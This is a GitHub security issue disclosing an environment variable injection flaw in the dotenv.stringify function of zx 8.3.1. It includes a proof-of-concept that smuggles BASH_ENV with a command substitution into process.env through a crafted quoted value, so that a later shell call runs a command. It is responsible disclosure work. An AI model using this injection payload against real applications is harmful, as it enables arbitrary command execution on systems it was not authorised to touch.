Closed
Description
I found a vulnerability in env API introduced at version 8.3.1. This issue is the security report.
Note:
I reported it to https://g.co/vulnz according to SECURITY.md. Because the Google Security Team said "Please feel free to publicly disclose this issue on GitHub as a public issue.", I made this issue.
Summary
google/zx has an Environment Variable Injection vulnerability in dotenv.stringify.
If users can control the values of an env object, the application may allow a malicious user to inject environment variables into process.env.
Details
dotenv.stringify uses formatValue:
If the environment value includes ", ', and `, the function improperly formats the value.
PoC
Tested in version zx@8.3.1 (latest)
import { $, dotenv, fs } from "zx";
import assert from "node:assert/strict";
const lang = "en_US\"'`\nBASH_ENV=$(id 1>&2)\nx=`"; // user-controllable
const env = {
LANG: lang,
};
await fs.writeFile(".env", dotenv.stringify(env));
dotenv.config(".env");
// `BASH_ENV` variable is injected.
assert.equal(process.env.BASH_ENV, "$(id 1>&2)");
await $`echo hello`;
// -> uid=0(root) gid=0(root) groups=0(root)